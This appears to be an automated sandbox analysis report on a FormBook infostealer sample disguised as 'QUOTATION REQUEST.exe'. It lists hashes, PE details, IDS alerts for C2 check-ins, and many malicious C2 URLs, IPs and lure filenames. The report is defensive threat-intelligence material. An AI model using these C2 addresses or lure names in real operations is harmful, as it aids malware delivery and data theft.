HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Simulations

Behavior and APIs

Time	Type	Description
16:50:16	API Interceptor	1x Sleep call for process: QUOTATION REQUEST.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
206.189.50.215	ord.xlsx	Get hash	malicious	Browse	www.sinjs.com/9t6k/?SH=/JGq4/4YxJz+WdaVKLJbsU3WO4BZskyzMKoifhcEF1OlgJOB0+LWMr5WE/H9GbqUquB5hg==&xJEtAr=ob5t_lh8bBV4p0V
206.189.50.215	HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe	Get hash	malicious	Browse	www.annatdinh.com/rzn/?adsDxBr=LlPhNGcD37JMUumX+kEarYtpi4Klq0VxdtwM/vuCBdiPqvI1ThpQyr489H39FTErr1oN&pPX=EFQxUrT06hHH
46.30.211.38	swift-copy-pdf.exe	Get hash	malicious	Browse	www.exm-droneops.one/e3eb/?njnddT=9rw0FP0HohtL&BjR=GqEi6Yd5KGKXJGsez51P10d6GItuYSt9GG1OTMHeaXK8Y98pInaKDp1JCB8r4VA4RapE
	Order Specifications With Ref Breve#T0876B96.exe	Get hash	malicious	Browse	www.exm-dronesecurity.online/utau/?DXOX-=3XTASjPbMxG7MxVTEoMIj975GwNpPDf6oZ2QEG7EwNJWi3Hjgnc3TCdbxgjDwy3JXd5A&KtxD=ZR-DOT9pJ
	Order Specification Requirement With Ref. AMABINIF38535.exe	Get hash	malicious	Browse	www.exm-dronesecurity.online/utau/?2dZ8=3XTASjPbMxG7MxVTEoMIj975GwNpPDf6oZ2QEG7EwNJWi3Hjgnc3TCdbxgjDwy3JXd5A&p64=8prxehCX
	AWB # 1398021925.exe	Get hash	malicious	Browse	www.kommodore.online/u2e/?lZKh=+ECPvwQ39XtrBM8GQ8ajXb0QqMDuQz+auMik1oYtzqlyZ6i03wadIj53eIsNHkTVe93Q&bbm8x=ohO4_z4XkJ2
	13ORDER_output86FE41F.exe	Get hash	malicious	Browse	www.immo-zee.com/fr/?l8G0YP=i85PPjqH0B&kvJd=XvC3jYZYAdJBJOPZODtAY0GXn+nf53Yl4flYPeh1AF15DOe8WVOZyaObuHVmw7rJcsr5
81.17.18.196	Zahlung SWIft pdf.exe	Get hash	malicious	Browse	www.novatechxf.com/gmn/?1bj=mlcpCduxHNI0Y&EHOh0Ns=9/XspZ693ppetOypWSOLo6AedDse4bDdf4puSoMOnOl8xYo2YgPQ0P9X1PNcFJafpRM9fydGXw==
	Yd7WOb1ksAj378N.exe	Get hash	malicious	Browse	www.amazservices.com/sdh/?1b8Hsf=aObbDgzESH23adbj+cD3wJG55ou7RGWwhU4Zia211xwJ558Q7tSQKjx7tO7i8y7MbYauelwpRQ==&j2MHoV=aDKhQD6PL
	RFQ_R4100131210.pdf.exe	Get hash	malicious	Browse	www.wwwmichiganbulb.com/aepn/?CTJt=fvRhZrK0A2LHGd&uFNl=gBD/03eYOl6TZ4jUScBQavvAu97AjjrwDUvtajBmOQSh5k7jvZ0F4av6otz9/GZBeG8K2OpCWw==
	9JFrEPf5w7.exe	Get hash	malicious	Browse	www.thesahwfam.com/aqu2/?p0G=5EjXvdr19C9mZVkY3fKTgvDOgP0S6WDmsKJe/OA2LcJULTMy4Vts0y1eMk/URiuGJfbh&uFNl=XP7tsTJp
	ntpxrxZCfL.exe	Get hash	malicious	Browse	www.aardvarkquiltshop.com/svh9/?Cda4=0umGITOmcMGS66eYJhV3vdt2NU7vGnAeTKQ9tbnXvxBh/ZWI10b2+VgHMWjGn0QWfvMu&2d=cbC0d
	cV1uaQeOGg.exe	Get hash	malicious	Browse	www.xn--ol-xia.com/hx3a/?wV=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVsnJA5VE4FfYV&PRh0iv=SPxhAX6XM2BTb
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	www.ronpaulmessge17.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=s1XmIF4uAe6fTL2LTbBupw5/VIm+RpLsWjfTUGlIzPAIV2hEXZAxjw34OwCk3cygHcUb
	OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exe	Get hash	malicious	Browse	www.gorrillaladders.com/smzu/?D8cH=9r8tQzN8o24l6vY&sXUlfNy=Au4G+9nOBNjwX+6Q2VhyJ/NKJEPsTFPrkjh+1zcY7UOPmsz1D8FaXIEN22BFi0962Fpa
	2021_03_08.exe	Get hash	malicious	Browse	www.curentcareri.com/2bg/?BRDtMX=RyM5PIi/QSOWL5nPv/e6Vp05T6+FVT1jMwP7f0ePw1H5GE8Rbiw/RNFowWbexxgv1bne&M694p=6lX0enMPBdyHut_p
	OVwf3NwhY3.exe	Get hash	malicious	Browse	www.gomonno.com/hks/?-Z=OLMsu5nL0XZchqEa4gjKZmAvw4IYLPHYXjnNPYhzxm2A6I77y1GSfyV/jQvmbgN5QGp+&2de=XnzLMfxH
	Scan_medcal equipment sample_pdf.exe	Get hash	malicious	Browse	www.factoryoutoetstore.com/mnk/
	RFQ for Marjan Development Program.exe	Get hash	malicious	Browse	www.melrosepubliclibrary.com/knf4/?Bv=XeHVmbd+8vcl6PWjCgitAATO7rv+88o+ayIyzDABErlOdMUEckU7qLpHg00nMcOPaBlU&el-=xPILu6SP
	payment advise.exe	Get hash	malicious	Browse	www.evalinkapuppets.com/wgn/?v4Xxa=jh72N97VMjwbOmR7IYrqs0yYsyG8v2l7CsVjR9/4MFsZVL3R6967pIpMUzWAR1CQwb33&sZyLVf=xVMpGjTx
	SKM_C221200706052800.exe	Get hash	malicious	Browse	www.comunityassn.com/s9zh/?aFNTkfLx=tknWlnMldXC7iCBNErlol2ZWcFkzI66RNwK0SX0HwmntnkBHipaMqEQDNIEnuMnu+H34&O2MtVN=iJEt_VihLTLX2JB0
	SHEXD2101127S_ShippingDocument_DkD.xlsx	Get hash	malicious	Browse	www.stonescapes1.com/de92/?Czud=Dpp83lZxpp6l-LP&9rbXut=FMDFc6rOlp10jaqop6r3BpbflKlZCzzEN1iblkluZIOvebj5bOK3jo1m1AppDhOD0Sh+SQ==
	Mv Maersk Kleven V949E_pdf.exe	Get hash	malicious	Browse	www.chriswoodgolf.com/p7t/?j6A4f=4z9uOfGNwGWkHbWfi9M5ou+2OgtUAPda65nsDZmgOm3nZIV75jGxAcG92+183yhb0LdpNymLVg==&MZhH=hHcPv2L
	PO190041.exe	Get hash	malicious	Browse	www.batttleroyaleuk.com/xnc/?Ezrp381X=Ok9AvPWPUKYaePVTL6j/d+7uOADfF/hwNe2/6JFu0ZvSkbhtf3C2Uccjo1JvrxSzjNxJ&lhrXP=Szrhs8g
	0VikCnzrVT.exe	Get hash	malicious	Browse	www.thejollychritsmasshop.com/t4vo/?2db=X48HMfxHf&-Z8=Qyo2wOonh0KIH1sRpfIv5e33Rfdwr6JIl7yH0AYUuPUk+FGKMKqwkRB3Y4CjXIZFAlYlGU6emg==
	invoice.exe	Get hash	malicious	Browse	www.newrochellenissan.com/hko6/?EZL0u8=Y+VQ9BZbgPDGGLPS45j8H17ru+3/rc0eIL+UVbdSmBp5MiMxja6tbTfwaOclkfU4QrLd0wJwTg==&GzuL=WDHT983XQdGpy2
	proforma invoice.exe	Get hash	malicious	Browse	www.merhomeimprovement.com/ga4/?AnE=WK4yvbuI6Z1Tg7oDUFoJuBG6KQsoBWQY7UxNok/U1mLpvVknrbotXhp0KJc/c7FVOilx&jFNHH=QrCdRLS

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	f84da301_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	f84da301_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	976ae877_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	65b79c6e_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	87537ed1_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	87537ed1_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	6e9fa6d0_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	6e9fa6d0_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	3f572144_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	3f572144_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	1ed17916_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	1ed17916_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	c27ded69_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	c27ded69_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	58dfce98_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	58dfce98_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	5545d583_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	5545d583_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	ca9bcb50_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	ca9bcb50_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
ONEANDONE-ASBrauerstrasse48DE	don.exe	Get hash	malicious	Browse	213.171.195.105
	Request For Quotation -48GH91.pdf.exe	Get hash	malicious	Browse	74.208.5.15
	O1E623TjjW.exe	Get hash	malicious	Browse	213.171.195.105
	product specification.xlsx	Get hash	malicious	Browse	213.171.195.105
	Proforma Invoice.exe	Get hash	malicious	Browse	74.208.5.2
	WaybillDoc_7349796565.pdf.exe	Get hash	malicious	Browse	74.208.236.79
	wMqdemYyHm.exe	Get hash	malicious	Browse	74.208.236.29
	NEW ORDER PO-168-2021.exe	Get hash	malicious	Browse	74.208.5.2
	INV 57474545.doc	Get hash	malicious	Browse	217.160.0.254
	MRQUolkoK7.exe	Get hash	malicious	Browse	217.160.0.158
	#U0420#U0430#U0445#U0443#U043d#U043e#U043a-#U0444#U0430#U043a#U0442#U0443#U0440#U0430.exe	Get hash	malicious	Browse	212.227.15.142
	z5Wqivscwd.exe	Get hash	malicious	Browse	74.208.236.235
	Updated April SOA.xlsx	Get hash	malicious	Browse	74.208.236.137
	y6f8O0kbEB.exe	Get hash	malicious	Browse	217.160.0.211
	978463537_BL FOR APPROVAL.doc	Get hash	malicious	Browse	217.160.0.254
	PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exe	Get hash	malicious	Browse	217.76.128.34
	APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exe	Get hash	malicious	Browse	217.76.128.34
	VIKRAMQST21-222.exe	Get hash	malicious	Browse	217.76.128.34
	29910022-001.exe	Get hash	malicious	Browse	74.208.5.15
	SHIPPING DOCS.exe	Get hash	malicious	Browse	74.208.5.15
UNIFIEDLAYER-AS-1US	gunzipped.exe	Get hash	malicious	Browse	192.254.189.182
	Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exe	Get hash	malicious	Browse	162.144.13.239
	0145d964_by_Libranalysis.exe	Get hash	malicious	Browse	162.241.169.22
	HXxk3mzZeW.exe	Get hash	malicious	Browse	192.185.140.111
	HCU213DES.doc	Get hash	malicious	Browse	162.241.169.22
	RFQ.exe	Get hash	malicious	Browse	192.254.236.251
	a3aa510e_by_Libranalysis.exe	Get hash	malicious	Browse	192.185.221.204
	Outstanding Payment Plan.xls	Get hash	malicious	Browse	192.185.129.69
	FULL SOA $16848.exe	Get hash	malicious	Browse	192.185.113.120
	BL Draft - HL-88312627.exe	Get hash	malicious	Browse	192.254.180.165
	ARIX SRLVl (MN) - Italy.exe	Get hash	malicious	Browse	192.254.185.244
	DocNo2300058329.doc__.rtf	Get hash	malicious	Browse	74.220.199.6
	NINGBO_STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	192.185.226.148
	signed contract invoice.exe	Get hash	malicious	Browse	192.254.236.251
	DUBAI UAE HCU4321890.exe	Get hash	malicious	Browse	162.241.169.22
	Payment Copy 0002.exe	Get hash	malicious	Browse	50.87.153.37
	diagram-586750002.xlsm	Get hash	malicious	Browse	192.185.46.61
	diagram-586750002.xlsm	Get hash	malicious	Browse	192.185.46.61
	nFmioaYJMR.exe	Get hash	malicious	Browse	192.185.140.111
	statistic-1048881972.xlsm	Get hash	malicious	Browse	192.254.233.89

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log Download File
Process:	C:\Users\user\Desktop\QUOTATION REQUEST.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.923340384145363
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	QUOTATION REQUEST.exe
File size:	745984
MD5:	64af41000584694858d0fcc37b1bf69b
SHA1:	707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256:	fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
SHA512:	dff4927081ff280eb4e707660c596adfbf8ada0f02cdbf8dd2414cb368b8036708558e854b892eda7dc0049c11df6ff1044cb0ec7c9ae9a32851ba3790fd7177
SSDEEP:	12288:xEPgph+pOidPx8aabrfIdyI8xejcPpjTp0tN8z4b5sT762uM+42QK4UkegeIH3zS:+YepFPORrfIfeKcPpjdEWGO76SIuUkqZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..`..............P..N..........Bl... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4b6c42
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x608FAD7A [Mon May 3 07:59:54 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb6bf0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb8000	0xe98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb4c48	0xb4e00	False	0.938404349516	data	7.93143837904	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xb8000	0xe98	0x1000	False	0.370849609375	data	4.72334355235	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xb8090	0x36c	data
RT_MANIFEST	0xb840c	0xa85	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	NameCache.exe
FileVersion	1.0.1.35
CompanyName	Unguest
LegalTrademarks	Unguest
Comments	A light media player
ProductName	LightWatch
ProductVersion	1.0.1.35
FileDescription	LightWatch
OriginalFilename	NameCache.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/03/21-16:51:12.447180	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49737	34.102.136.180	192.168.2.3
05/03/21-16:51:17.587124	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	34.102.136.180
05/03/21-16:51:17.587124	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	34.102.136.180
05/03/21-16:51:17.587124	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	34.102.136.180
05/03/21-16:51:17.729289	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49738	34.102.136.180	192.168.2.3
05/03/21-16:51:28.192008	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49745	34.102.136.180	192.168.2.3
05/03/21-16:51:33.349998	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	34.102.136.180
05/03/21-16:51:33.349998	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	34.102.136.180
05/03/21-16:51:33.349998	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	34.102.136.180
05/03/21-16:51:33.487458	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49746	34.102.136.180	192.168.2.3
05/03/21-16:51:38.629651	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
05/03/21-16:51:38.629651	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
05/03/21-16:51:38.629651	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
05/03/21-16:51:38.766555	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49747	34.102.136.180	192.168.2.3
05/03/21-16:51:49.181249	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	81.17.18.196
05/03/21-16:51:49.181249	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	81.17.18.196
05/03/21-16:51:49.181249	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	81.17.18.196
05/03/21-16:51:59.515071	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.3	206.189.50.215
05/03/21-16:51:59.515071	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.3	206.189.50.215
05/03/21-16:51:59.515071	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.3	206.189.50.215
05/03/21-16:52:04.990890	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	192.185.131.134
05/03/21-16:52:04.990890	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	192.185.131.134
05/03/21-16:52:04.990890	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	192.185.131.134
05/03/21-16:52:15.430581	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	46.30.211.38
05/03/21-16:52:15.430581	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	46.30.211.38
05/03/21-16:52:15.430581	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	46.30.211.38

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 16:51:01.838931084 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:01.999315023 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:01.999450922 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:01.999663115 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:02.159781933 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:02.166860104 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:02.166877985 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:02.166970968 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:02.167031050 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:02.167073965 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:02.167079926 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:02.328871965 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:12.268404961 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.309473038 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:12.309567928 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.309696913 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.350687027 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:12.447180033 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:12.447208881 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:12.447412968 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.447560072 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.488730907 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.543899059 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.585552931 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.586942911 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.587124109 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.629646063 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.729289055 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.729310989 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.729551077 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.729571104 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.771555901 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.013853073 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.054970980 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.055130959 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.055273056 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.096163034 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.192008018 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.192035913 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.192183971 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.192226887 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.233724117 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.307164907 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.349216938 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.349685907 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.349997997 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.390871048 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.487457991 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.487482071 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.487649918 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.487713099 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.528758049 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.586014032 CEST	49747	80	192.168.2.3	34.102.136.180
